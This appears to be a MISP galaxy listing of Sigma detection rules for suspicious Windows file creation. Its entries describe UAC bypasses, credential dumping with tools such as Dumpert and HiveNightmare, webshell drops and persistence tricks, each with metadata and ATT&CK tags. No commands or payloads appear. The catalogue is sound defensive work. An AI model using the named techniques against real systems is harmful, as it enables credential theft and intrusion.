UUID 576426ad-0131-4001-ae01-be175da0c108 which can be used as unique global reference for PowerShell Script Dropped Via PowerShell.EXE in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author frack113
creation_date 2023-05-09
falsepositive ['False positives will differ depending on the environment and scripts used. Apply additional filters accordingly.']
filename file_event_win_powershell_drop_powershell.yml
level low
logsource.category file_event
logsource.product windows
tags ['attack.persistence']

Potential Suspicious PowerShell Module File Created

Detects the creation of a new PowerShell module in the first folder of the module directory structure "\WindowsPowerShell\Modules\malware\malware.psm1". This is somewhat an uncommon practice as legitimate modules often includes a version folder.

Internal MISP references

UUID e8a52bbd-bced-459f-bd93-64db45ce7657 which can be used as unique global reference for Potential Suspicious PowerShell Module File Created in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Nasreddine Bencherchali (Nextron Systems)
creation_date 2023-05-09
falsepositive ['False positive rate will vary depending on the environments. Additional filters might be required to make this logic usable in production.']
filename file_event_win_powershell_module_susp_creation.yml
level medium
logsource.category file_event
logsource.product windows
tags ['attack.persistence']

Potential Webshell Creation On Static Website

Detects the creation of files with certain extensions on a static web site. This can be indicative of potential uploads of a web shell.

Internal MISP references

UUID 39f1f9f2-9636-45de-98f6-a4046aa8e4b9 which can be used as unique global reference for Potential Webshell Creation On Static Website in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Beyu Denis, oscd.community, Tim Shelton, Thurein Oo
creation_date 2019-10-22
falsepositive ['Legitimate administrator or developer creating legitimate executable files in a web application folder']
filename file_event_win_webshell_creation_detect.yml
level medium
logsource.category file_event
logsource.product windows
tags ['attack.persistence', 'attack.t1505.003']
Related clusters

To see the related clusters, click here.

UAC Bypass Using EventVwr

Detects the pattern of a UAC bypass using Windows Event Viewer

Internal MISP references

UUID 63e4f530-65dc-49cc-8f80-ccfa95c69d43 which can be used as unique global reference for UAC Bypass Using EventVwr in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Antonio Cocomazzi (idea), Florian Roth (Nextron Systems)
creation_date 2022-04-27
falsepositive ['Unknown']
filename file_event_win_uac_bypass_eventvwr.yml
level high
logsource.category file_event
logsource.product windows
tags ['attack.defense-evasion', 'attack.privilege-escalation']

Suspicious desktop.ini Action

Detects unusual processes accessing desktop.ini, which can be leveraged to alter how Explorer displays a folder's content (i.e. renaming files) without changing them on disk.

Internal MISP references

UUID 81315b50-6b60-4d8f-9928-3466e1022515 which can be used as unique global reference for Suspicious desktop.ini Action in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Maxime Thiebaut (@0xThiebaut), Tim Shelton (HAWK.IO)
creation_date 2020-03-19
falsepositive ['Operations performed through Windows SCCM or equivalent', 'Read only access list authority']
filename file_event_win_susp_desktop_ini.yml
level medium
logsource.category file_event
logsource.product windows
tags ['attack.privilege-escalation', 'attack.persistence', 'attack.t1547.009']
Related clusters

To see the related clusters, click here.

ScreenConnect Temporary Installation Artefact

An adversary may use legitimate desktop support and remote access software, such as Team Viewer, Go2Assist, LogMein, AmmyyAdmin, etc, to establish an interactive command and control channel to target systems within networks. These services are commonly used as legitimate technical support software, and may be allowed by application control within a target environment. Remote access tools like VNC, Ammyy, and Teamviewer are used frequently when compared with other legitimate software commonly used by adversaries. (Citation: Symantec Living off the Land)

Internal MISP references

UUID fec96f39-988b-4586-b746-b93d59fd1922 which can be used as unique global reference for ScreenConnect Temporary Installation Artefact in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author frack113
creation_date 2022-02-13
falsepositive ['Legitimate use']
filename file_event_win_remote_access_tools_screenconnect_artefact.yml
level medium
logsource.category file_event
logsource.product windows
tags ['attack.command-and-control', 'attack.t1219.002']
Related clusters

To see the related clusters, click here.

PowerShell Profile Modification

Detects the creation or modification of a powershell profile which could indicate suspicious activity as the profile can be used as a mean of persistence

Internal MISP references

UUID b5b78988-486d-4a80-b991-930eff3ff8bf which can be used as unique global reference for PowerShell Profile Modification in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author HieuTT35, Nasreddine Bencherchali (Nextron Systems)
creation_date 2019-10-24
falsepositive ['System administrator creating Powershell profile manually']
filename file_event_win_susp_powershell_profile.yml
level medium
logsource.category file_event
logsource.product windows
tags ['attack.persistence', 'attack.privilege-escalation', 'attack.t1546.013']
Related clusters

To see the related clusters, click here.

Potential Persistence Via Outlook Form

Detects the creation of a new Outlook form which can contain malicious code

Internal MISP references

UUID c3edc6a5-d9d4-48d8-930e-aab518390917 which can be used as unique global reference for Potential Persistence Via Outlook Form in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Tobias Michalski (Nextron Systems)
creation_date 2021-06-10
falsepositive ['Legitimate use of outlook forms']
filename file_event_win_office_outlook_newform.yml
level high
logsource.category file_event
logsource.product windows
tags ['attack.persistence', 'attack.t1137.003']
Related clusters

To see the related clusters, click here.

Rclone Config File Creation

Detects Rclone config files being created

Internal MISP references

UUID 34986307-b7f4-49be-92f3-e7a4d01ac5db which can be used as unique global reference for Rclone Config File Creation in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Aaron Greetham (@beardofbinary) - NCC Group
creation_date 2021-05-26
falsepositive ['Legitimate Rclone usage']
filename file_event_win_rclone_config_files.yml
level medium
logsource.category file_event
logsource.product windows
tags ['attack.exfiltration', 'attack.t1567.002']
Related clusters

To see the related clusters, click here.

Potential RipZip Attack on Startup Folder

Detects a phishing attack which expands a ZIP file containing a malicious shortcut. If the victim expands the ZIP file via the explorer process, then the explorer process expands the malicious ZIP file and drops a malicious shortcut redirected to a backdoor into the Startup folder. Additionally, the file name of the malicious shortcut in Startup folder contains {0AFACED1-E828-11D1-9187-B532F1E9575D} meaning the folder shortcut operation.

Internal MISP references

UUID a6976974-ea6f-4e97-818e-ea08625c52cb which can be used as unique global reference for Potential RipZip Attack on Startup Folder in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Greg (rule)
creation_date 2022-07-21
falsepositive ['Unknown']
filename file_event_win_ripzip_attack.yml
level high
logsource.category file_event
logsource.product windows
tags ['attack.privilege-escalation', 'attack.persistence', 'attack.t1547']
Related clusters

To see the related clusters, click here.

CSExec Service File Creation

Detects default CSExec service filename which indicates CSExec service installation and execution

Internal MISP references

UUID f0e2b768-5220-47dd-b891-d57b96fc0ec1 which can be used as unique global reference for CSExec Service File Creation in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Nasreddine Bencherchali (Nextron Systems)
creation_date 2023-08-04
falsepositive ['Unknown']
filename file_event_win_csexec_service.yml
level medium
logsource.category file_event
logsource.product windows
tags ['attack.execution', 'attack.t1569.002', 'attack.s0029']
Related clusters

To see the related clusters, click here.

Potentially Suspicious WDAC Policy File Creation

Detects suspicious Windows Defender Application Control (WDAC) policy file creation from abnormal processes that could be abused by attacker to block EDR/AV components while allowing their own malicious code to run on the system.

Internal MISP references

UUID 1d2de8a6-4803-4fde-b85b-f58f3aa7a705 which can be used as unique global reference for Potentially Suspicious WDAC Policy File Creation in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author X__Junior
creation_date 2025-02-07
falsepositive ['Administrators and security vendors could leverage WDAC, apply additional filters as needed.']
filename file_event_win_susp_wdac_policy_creation.yml
level medium
logsource.category file_event
logsource.product windows
tags ['attack.defense-evasion']

UAC Bypass Using MSConfig Token Modification - File

Detects the pattern of UAC Bypass using a msconfig GUI hack (UACMe 55)

Internal MISP references

UUID 41bb431f-56d8-4691-bb56-ed34e390906f which can be used as unique global reference for UAC Bypass Using MSConfig Token Modification - File in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Christian Burkard (Nextron Systems)
creation_date 2021-08-30
falsepositive ['Unknown']
filename file_event_win_uac_bypass_msconfig_gui.yml
level high
logsource.category file_event
logsource.product windows
tags ['attack.defense-evasion', 'attack.privilege-escalation', 'attack.t1548.002']
Related clusters

To see the related clusters, click here.

Octopus Scanner Malware

Detects Octopus Scanner Malware.

Internal MISP references

UUID 805c55d9-31e6-4846-9878-c34c75054fe9 which can be used as unique global reference for Octopus Scanner Malware in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author NVISO
creation_date 2020-06-09
falsepositive ['Unknown']
filename file_event_win_mal_octopus_scanner.yml
level high
logsource.category file_event
logsource.product windows
tags ['attack.initial-access', 'attack.t1195', 'attack.t1195.001']
Related clusters

To see the related clusters, click here.

Hijack Legit RDP Session to Move Laterally

Detects the usage of tsclient share to place a backdoor on the RDP source machine's startup folder

Internal MISP references

UUID 52753ea4-b3a0-4365-910d-36cff487b789 which can be used as unique global reference for Hijack Legit RDP Session to Move Laterally in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Samir Bousseaden
creation_date 2019-02-21
falsepositive ['Unlikely']
filename file_event_win_tsclient_filewrite_startup.yml
level high
logsource.category file_event
logsource.product windows
tags ['attack.command-and-control', 'attack.t1219.002']
Related clusters

To see the related clusters, click here.

Files With System DLL Name In Unsuspected Locations

Detects the creation of a file with the ".dll" extension that has the name of a System DLL in uncommon or unsuspected locations. (Outisde of "System32", "SysWOW64", etc.). It is highly recommended to perform an initial baseline before using this rule in production.

Internal MISP references

UUID 13c02350-4177-4e45-ac17-cf7ca628ff5e which can be used as unique global reference for Files With System DLL Name In Unsuspected Locations in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Nasreddine Bencherchali (Nextron Systems)
creation_date 2024-06-24
falsepositive ['Third party software might bundle specific versions of system DLLs.']
filename file_event_win_creation_system_dll_files.yml
level medium
logsource.category file_event
logsource.product windows
tags ['attack.defense-evasion', 'attack.t1036.005']
Related clusters

To see the related clusters, click here.

Renamed VsCode Code Tunnel Execution - File Indicator

Detects the creation of a file with the name "code_tunnel.json" which indicate execution and usage of VsCode tunneling utility by an "Image" or "Process" other than VsCode.

Internal MISP references

UUID d102b8f5-61dc-4e68-bd83-9a3187c67377 which can be used as unique global reference for Renamed VsCode Code Tunnel Execution - File Indicator in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Nasreddine Bencherchali (Nextron Systems)
creation_date 2023-10-25
falsepositive ['Unknown']
filename file_event_win_vscode_tunnel_renamed_execution.yml
level high
logsource.category file_event
logsource.product windows
tags ['attack.command-and-control']

Suspicious Binaries and Scripts in Public Folder

Detects the creation of a file with a suspicious extension in the public folder, which could indicate potential malicious activity.

Internal MISP references

UUID b447f7de-1e53-4cbf-bfb4-f1f6d0b04e4e which can be used as unique global reference for Suspicious Binaries and Scripts in Public Folder in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author The DFIR Report
creation_date 2025-01-23
falsepositive ['Administrators deploying legitimate binaries to public folders.']
filename file_event_win_susp_public_folder_extension.yml
level high
logsource.category file_event
logsource.product windows
tags ['attack.execution', 'attack.t1204']
Related clusters

To see the related clusters, click here.

Windows Binaries Write Suspicious Extensions

Detects Windows executables that write files with suspicious extensions

Internal MISP references

UUID b8fd0e93-ff58-4cbd-8f48-1c114e342e62 which can be used as unique global reference for Windows Binaries Write Suspicious Extensions in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Nasreddine Bencherchali (Nextron Systems)
creation_date 2022-08-12
falsepositive ['Unknown']
filename file_event_win_shell_write_susp_files_extensions.yml
level high
logsource.category file_event
logsource.product windows
tags ['attack.defense-evasion', 'attack.t1036']
Related clusters

To see the related clusters, click here.

New Custom Shim Database Created

Adversaries may establish persistence and/or elevate privileges by executing malicious content triggered by application shims. The Microsoft Windows Application Compatibility Infrastructure/Framework (Application Shim) was created to allow for backward compatibility of software as the operating system codebase changes over time.

Internal MISP references

UUID ee63c85c-6d51-4d12-ad09-04e25877a947 which can be used as unique global reference for New Custom Shim Database Created in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author frack113, Nasreddine Bencherchali (Nextron Systems)
creation_date 2021-12-29
falsepositive ['Legitimate custom SHIM installations will also trigger this rule']
filename file_event_win_creation_new_shim_database.yml
level medium
logsource.category file_event
logsource.product windows
tags ['attack.privilege-escalation', 'attack.persistence', 'attack.t1547.009']
Related clusters

To see the related clusters, click here.

Detects the pattern of UAC Bypass using consent.exe and comctl32.dll (UACMe 22)

Internal MISP references

UUID 62ed5b55-f991-406a-85d9-e8e8fdf18789 which can be used as unique global reference for UAC Bypass Using Consent and Comctl32 - File in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Christian Burkard (Nextron Systems)
creation_date 2021-08-23
falsepositive ['Unknown']
filename file_event_win_uac_bypass_consent_comctl32.yml
level high
logsource.category file_event
logsource.product windows
tags ['attack.defense-evasion', 'attack.privilege-escalation', 'attack.t1548.002']
Related clusters

To see the related clusters, click here.

Potential Startup Shortcut Persistence Via PowerShell.EXE

Detects PowerShell writing startup shortcuts. This procedure was highlighted in Red Canary Intel Insights Oct. 2021, "We frequently observe adversaries using PowerShell to write malicious .lnk files into the startup directory to establish persistence. Accordingly, this detection opportunity is likely to identify persistence mechanisms in multiple threats. In the context of Yellow Cockatoo, this persistence mechanism eventually launches the command-line script that leads to the installation of a malicious DLL"

Internal MISP references

UUID 92fa78e7-4d39-45f1-91a3-8b23f3f1088d which can be used as unique global reference for Potential Startup Shortcut Persistence Via PowerShell.EXE in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Christopher Peacock '@securepeacock', SCYTHE
creation_date 2021-10-24
falsepositive ['Depending on your environment accepted applications may leverage this at times. It is recommended to search for anomalies inidicative of malware.']
filename file_event_win_powershell_startup_shortcuts.yml
level high
logsource.category file_event
logsource.product windows
tags ['attack.privilege-escalation', 'attack.persistence', 'attack.t1547.001']
Related clusters

To see the related clusters, click here.

Cred Dump Tools Dropped Files

Files with well-known filenames (parts of credential dump software or files produced by them) creation

Internal MISP references

UUID 8fbf3271-1ef6-4e94-8210-03c2317947f6 which can be used as unique global reference for Cred Dump Tools Dropped Files in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Teymur Kheirkhabarov, oscd.community
creation_date 2019-11-01
falsepositive ['Legitimate Administrator using tool for password recovery']
filename file_event_win_cred_dump_tools_dropped_files.yml
level high
logsource.category file_event
logsource.product windows
tags ['attack.credential-access', 'attack.t1003.001', 'attack.t1003.002', 'attack.t1003.003', 'attack.t1003.004', 'attack.t1003.005']
Related clusters

To see the related clusters, click here.

Suspicious File Created in Outlook Temporary Directory

Detects the creation of files with suspicious file extensions in the temporary directory that Outlook uses when opening attachments. This can be used to detect spear-phishing campaigns that use suspicious files as attachments, which may contain malicious code.

Internal MISP references

UUID fabb0e80-030c-4e3e-a104-d09676991ac3 which can be used as unique global reference for Suspicious File Created in Outlook Temporary Directory in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Florian Roth (Nextron Systems), Swachchhanda Shrawan Poudel (Nextron Systems)
creation_date 2025-07-22
falsepositive ['Opening of headers or footers in email signatures that include SVG images or legitimate SVG attachments']
filename file_event_win_office_outlook_susp_file_creation_in_temp_dir.yml
level high
logsource.category file_event
logsource.product windows
tags ['attack.initial-access', 'attack.t1566.001']
Related clusters

To see the related clusters, click here.

HackTool - Inveigh Execution Artefacts

Detects the presence and execution of Inveigh via dropped artefacts

Internal MISP references

UUID bb09dd3e-2b78-4819-8e35-a7c1b874e449 which can be used as unique global reference for HackTool - Inveigh Execution Artefacts in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Nasreddine Bencherchali (Nextron Systems)
creation_date 2022-10-24
falsepositive ['Unlikely']
filename file_event_win_hktl_inveigh_artefacts.yml
level critical
logsource.category file_event
logsource.product windows
tags ['attack.command-and-control', 'attack.t1219.002']
Related clusters

To see the related clusters, click here.

Legitimate Application Dropped Script

Detects programs on a Windows system that should not write scripts to disk

Internal MISP references

UUID 7d604714-e071-49ff-8726-edeb95a70679 which can be used as unique global reference for Legitimate Application Dropped Script in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author frack113, Florian Roth (Nextron Systems)
creation_date 2022-08-21
falsepositive ['Unknown']
filename file_event_win_susp_legitimate_app_dropping_script.yml
level high
logsource.category file_event
logsource.product windows
tags ['attack.defense-evasion', 'attack.t1218']
Related clusters

To see the related clusters, click here.

Potential Persistence Attempt Via ErrorHandler.Cmd

Detects creation of a file named "ErrorHandler.cmd" in the "C:\WINDOWS\Setup\Scripts\" directory which could be used as a method of persistence The content of C:\WINDOWS\Setup\Scripts\ErrorHandler.cmd is read whenever some tools under C:\WINDOWS\System32\oobe\ (e.g. Setup.exe) fail to run for any reason.

Internal MISP references

UUID 15904280-565c-4b73-9303-3291f964e7f9 which can be used as unique global reference for Potential Persistence Attempt Via ErrorHandler.Cmd in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Nasreddine Bencherchali (Nextron Systems)
creation_date 2022-08-09
falsepositive ['Unknown']
filename file_event_win_errorhandler_persistence.yml
level medium
logsource.category file_event
logsource.product windows
tags ['attack.persistence']

Suspicious LNK Double Extension File Created

Detects the creation of files with an "LNK" as a second extension. This is sometimes used by malware as a method to abuse the fact that Windows hides the "LNK" extension by default.

Internal MISP references

UUID 3215aa19-f060-4332-86d5-5602511f3ca8 which can be used as unique global reference for Suspicious LNK Double Extension File Created in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Nasreddine Bencherchali (Nextron Systems), frack113
creation_date 2022-11-07
falsepositive ['Some tuning is required for other general purpose directories of third party apps']
filename file_event_win_susp_lnk_double_extension.yml
level medium
logsource.category file_event
logsource.product windows
tags ['attack.defense-evasion', 'attack.t1036.007']
Related clusters

To see the related clusters, click here.

NTDS.DIT Creation By Uncommon Parent Process

Detects creation of a file named "ntds.dit" (Active Directory Database) by an uncommon parent process or directory

Internal MISP references

UUID 4e7050dd-e548-483f-b7d6-527ab4fa784d which can be used as unique global reference for NTDS.DIT Creation By Uncommon Parent Process in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Florian Roth (Nextron Systems)
creation_date 2022-03-11
falsepositive ['Unknown']
filename file_event_win_ntds_dit_uncommon_parent_process.yml
level high
logsource.category file_event
logsource.product windows
tags ['attack.credential-access', 'attack.t1003.003']
Related clusters

To see the related clusters, click here.

File With Uncommon Extension Created By An Office Application

Detects the creation of files with an executable or script extension by an Office application.

Internal MISP references

UUID c7a74c80-ba5a-486e-9974-ab9e682bc5e4 which can be used as unique global reference for File With Uncommon Extension Created By An Office Application in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Vadim Khrykov (ThreatIntel), Cyb3rEng (Rule), Nasreddine Bencherchali (Nextron Systems)
creation_date 2021-08-23
falsepositive ['Unknown']
filename file_event_win_office_susp_file_extension.yml
level high
logsource.category file_event
logsource.product windows
tags ['attack.t1204.002', 'attack.execution']
Related clusters

To see the related clusters, click here.

Created Files by Microsoft Sync Center

This rule detects suspicious files created by Microsoft Sync Center (mobsync)

Internal MISP references

UUID 409f8a98-4496-4aaa-818a-c931c0a8b832 which can be used as unique global reference for Created Files by Microsoft Sync Center in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author elhoim
creation_date 2022-04-28
falsepositive ['Unknown']
filename file_event_win_susp_creation_by_mobsync.yml
level medium
logsource.category file_event
logsource.product windows
tags ['attack.privilege-escalation', 'attack.t1055', 'attack.t1218', 'attack.execution', 'attack.defense-evasion']
Related clusters

To see the related clusters, click here.

HackTool - CrackMapExec File Indicators

Detects file creation events with filename patterns used by CrackMapExec.

Internal MISP references

UUID 736ffa74-5f6f-44ca-94ef-1c0df4f51d2a which can be used as unique global reference for HackTool - CrackMapExec File Indicators in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Nasreddine Bencherchali (Nextron Systems)
creation_date 2024-03-11
falsepositive ['Unknown']
filename file_event_win_hktl_crackmapexec_indicators.yml
level high
logsource.category file_event
logsource.product windows
tags ['attack.credential-access', 'attack.t1003.001']
Related clusters

To see the related clusters, click here.

Suspicious File Write to Webapps Root Directory

Detects suspicious file writes to the root directory of web applications, particularly Apache web servers or Tomcat servers. This may indicate an attempt to deploy malicious files such as web shells or other unauthorized scripts.

Internal MISP references

UUID 89c42960-f244-4dad-9151-ae9b1a3287a2 which can be used as unique global reference for Suspicious File Write to Webapps Root Directory in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Swachchhanda Shrawan Poudel (Nextron Systems)
creation_date 2025-10-20
falsepositive ['Unknown']
filename file_event_win_susp_file_write_in_webapps_root.yml
level medium
logsource.category file_event
logsource.product windows
tags ['attack.persistence', 'attack.t1505.003', 'attack.initial-access', 'attack.t1190']
Related clusters

To see the related clusters, click here.

Uncommon File Creation By Mysql Daemon Process

Detects the creation of files with scripting or executable extensions by Mysql daemon. Which could be an indicator of "User Defined Functions" abuse to download malware.

Internal MISP references

UUID c61daa90-3c1e-4f18-af62-8f288b5c9aaf which can be used as unique global reference for Uncommon File Creation By Mysql Daemon Process in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Joseph Kamau
creation_date 2024-05-27
falsepositive ['Unknown']
filename file_event_win_mysqld_uncommon_file_creation.yml
level high
logsource.category file_event
logsource.product windows
tags ['attack.defense-evasion']

HackTool - Typical HiveNightmare SAM File Export

Detects files written by the different tools that exploit HiveNightmare

Internal MISP references

UUID 6ea858a8-ba71-4a12-b2cc-5d83312404c7 which can be used as unique global reference for HackTool - Typical HiveNightmare SAM File Export in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Florian Roth (Nextron Systems)
creation_date 2021-07-23
falsepositive ['Files that accidentally contain these strings']
filename file_event_win_hktl_hivenightmare_file_exports.yml
level high
logsource.category file_event
logsource.product windows
tags ['attack.credential-access', 'attack.t1552.001', 'cve.2021-36934']
Related clusters

To see the related clusters, click here.

Suspicious Outlook Macro Created

Detects the creation of a macro file for Outlook.

Internal MISP references

UUID 117d3d3a-755c-4a61-b23e-9171146d094c which can be used as unique global reference for Suspicious Outlook Macro Created in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Nasreddine Bencherchali (Nextron Systems)
creation_date 2023-02-08
falsepositive ['Unlikely']
filename file_event_win_office_outlook_susp_macro_creation.yml
level high
logsource.category file_event
logsource.product windows
tags ['attack.privilege-escalation', 'attack.persistence', 'attack.command-and-control', 'attack.t1137', 'attack.t1008', 'attack.t1546']
Related clusters

To see the related clusters, click here.

UAC Bypass Using .NET Code Profiler on MMC

Detects the pattern of UAC Bypass using .NET Code Profiler and mmc.exe DLL hijacking (UACMe 39)

Internal MISP references

UUID 93a19907-d4f9-4deb-9f91-aac4692776a6 which can be used as unique global reference for UAC Bypass Using .NET Code Profiler on MMC in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Christian Burkard (Nextron Systems)
creation_date 2021-08-30
falsepositive ['Unknown']
filename file_event_win_uac_bypass_dotnet_profiler.yml
level high
logsource.category file_event
logsource.product windows
tags ['attack.defense-evasion', 'attack.privilege-escalation', 'attack.t1548.002']
Related clusters

To see the related clusters, click here.

Suspicious File Creation Activity From Fake Recycle.Bin Folder

Detects file write event from/to a fake recycle bin folder that is often used as a staging directory for malware

Internal MISP references

UUID cd8b36ac-8e4a-4c2f-a402-a29b8fbd5bca which can be used as unique global reference for Suspicious File Creation Activity From Fake Recycle.Bin Folder in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author X__Junior (Nextron Systems)
creation_date 2023-07-12
falsepositive ['Unknown']
filename file_event_win_susp_recycle_bin_fake_exec.yml
level high
logsource.category file_event
logsource.product windows
tags ['attack.persistence', 'attack.defense-evasion']

LSASS Process Dump Artefact In CrashDumps Folder

Detects the presence of an LSASS dump file in the "CrashDumps" folder. This could be a sign of LSASS credential dumping. Techniques such as the LSASS Shtinkering have been seen abusing the Windows Error Reporting to dump said process.

Internal MISP references

UUID 6902955a-01b7-432c-b32a-6f5f81d8f625 which can be used as unique global reference for LSASS Process Dump Artefact In CrashDumps Folder in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author @pbssubhash
creation_date 2022-12-08
falsepositive ['Rare legitimate dump of the process by the operating system due to a crash of lsass']
filename file_event_win_lsass_shtinkering.yml
level high
logsource.category file_event
logsource.product windows
tags ['attack.credential-access', 'attack.t1003.001']
Related clusters

To see the related clusters, click here.

Wmiexec Default Output File

Detects the creation of the default output filename used by the wmiexec tool

Internal MISP references

UUID 8d5aca11-22b3-4f22-b7ba-90e60533e1fb which can be used as unique global reference for Wmiexec Default Output File in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Nasreddine Bencherchali (Nextron Systems)
creation_date 2022-06-02
falsepositive ['Unlikely']
filename file_event_win_wmiexec_default_filename.yml
level critical
logsource.category file_event
logsource.product windows
tags ['attack.lateral-movement', 'attack.execution', 'attack.t1047']
Related clusters

To see the related clusters, click here.

ISO File Created Within Temp Folders

Detects the creation of a ISO file in the Outlook temp folder or in the Appdata temp folder. Typical of Qakbot TTP from end-July 2022.

Internal MISP references

UUID 2f9356ae-bf43-41b8-b858-4496d83b2acb which can be used as unique global reference for ISO File Created Within Temp Folders in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author @sam0x90
creation_date 2022-07-30
falsepositive ['Potential FP by sysadmin opening a zip file containing a legitimate ISO file']
filename file_event_win_iso_file_mount.yml
level high
logsource.category file_event
logsource.product windows
tags ['attack.initial-access', 'attack.t1566.001']
Related clusters

To see the related clusters, click here.

Drop Binaries Into Spool Drivers Color Folder

Detects the creation of suspcious binary files inside the "\windows\system32\spool\drivers\color\" as seen in the blog referenced below

Internal MISP references

UUID ce7066a6-508a-42d3-995b-2952c65dc2ce which can be used as unique global reference for Drop Binaries Into Spool Drivers Color Folder in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Nasreddine Bencherchali (Nextron Systems)
creation_date 2022-07-28
falsepositive ['Unknown']
filename file_event_win_susp_spool_drivers_color_drop.yml
level medium
logsource.category file_event
logsource.product windows
tags ['attack.defense-evasion']

Suspicious File Drop by Exchange

Detects suspicious file type dropped by an Exchange component in IIS

Internal MISP references

UUID 6b269392-9eba-40b5-acb6-55c882b20ba6 which can be used as unique global reference for Suspicious File Drop by Exchange in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Florian Roth (Nextron Systems)
creation_date 2022-10-04
falsepositive ['Unknown']
filename file_event_win_exchange_webshell_drop_suspicious.yml
level medium
logsource.category file_event
logsource.product windows
tags ['attack.persistence', 'attack.t1190', 'attack.initial-access', 'attack.t1505.003']
Related clusters

To see the related clusters, click here.

LiveKD Driver Creation

Detects the creation of the LiveKD driver, which is used for live kernel debugging

Internal MISP references

UUID 16fe46bb-4f64-46aa-817d-ff7bec4a2352 which can be used as unique global reference for LiveKD Driver Creation in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Nasreddine Bencherchali (Nextron Systems)
creation_date 2023-05-16
falsepositive ['Legitimate usage of LiveKD for debugging purposes will also trigger this']
filename file_event_win_sysinternals_livekd_driver.yml
level medium
logsource.category file_event
logsource.product windows
tags ['attack.defense-evasion', 'attack.privilege-escalation']

HackTool - Dumpert Process Dumper Default File

Detects the creation of the default dump file used by Outflank Dumpert tool. A process dumper, which dumps the lsass process memory

Internal MISP references

UUID 93d94efc-d7ad-4161-ad7d-1638c4f908d8 which can be used as unique global reference for HackTool - Dumpert Process Dumper Default File in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Florian Roth (Nextron Systems)
creation_date 2020-02-04
falsepositive ['Very unlikely']
filename file_event_win_hktl_dumpert.yml
level critical
logsource.category file_event
logsource.product windows
tags ['attack.credential-access', 'attack.t1003.001']
Related clusters

To see the related clusters, click here.

ADSI-Cache File Creation By Uncommon Tool

Detects the creation of an "Active Directory Schema Cache File" (.sch) file by an uncommon tool.

Internal MISP references

UUID 75bf09fa-1dd7-4d18-9af9-dd9e492562eb which can be used as unique global reference for ADSI-Cache File Creation By Uncommon Tool in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author xknow @xknow_infosec, Tim Shelton
creation_date 2019-03-24
falsepositive ['Other legimate tools, which do ADSI (LDAP) operations, e.g. any remoting activity by MMC, Powershell, Windows etc.']
filename file_event_win_adsi_cache_creation_by_uncommon_tool.yml
level medium
logsource.category file_event
logsource.product windows
tags ['attack.t1001.003', 'attack.command-and-control']
Related clusters

To see the related clusters, click here.

HackTool - Impacket File Indicators

Detects file creation events with filename patterns used by Impacket.

Internal MISP references

UUID 03f4ca17-de95-428d-a75a-4ee78b047256 which can be used as unique global reference for HackTool - Impacket File Indicators in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author The DFIR Report, IrishDeath
creation_date 2025-05-19
falsepositive ['Unknown']
filename file_event_win_impacket_file_indicators.yml
level high
logsource.category file_event
logsource.product windows
tags ['attack.credential-access', 'attack.t1003.001']
Related clusters

To see the related clusters, click here.

Office Macro File Creation

Detects the creation of a new office macro files on the systems

Internal MISP references

UUID 91174a41-dc8f-401b-be89-7bfc140612a0 which can be used as unique global reference for Office Macro File Creation in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Nasreddine Bencherchali (Nextron Systems)
creation_date 2022-01-23
falsepositive ['Very common in environments that rely heavily on macro documents']
filename file_event_win_office_macro_files_created.yml
level low
logsource.category file_event
logsource.product windows
tags ['attack.initial-access', 'attack.t1566.001']
Related clusters

To see the related clusters, click here.

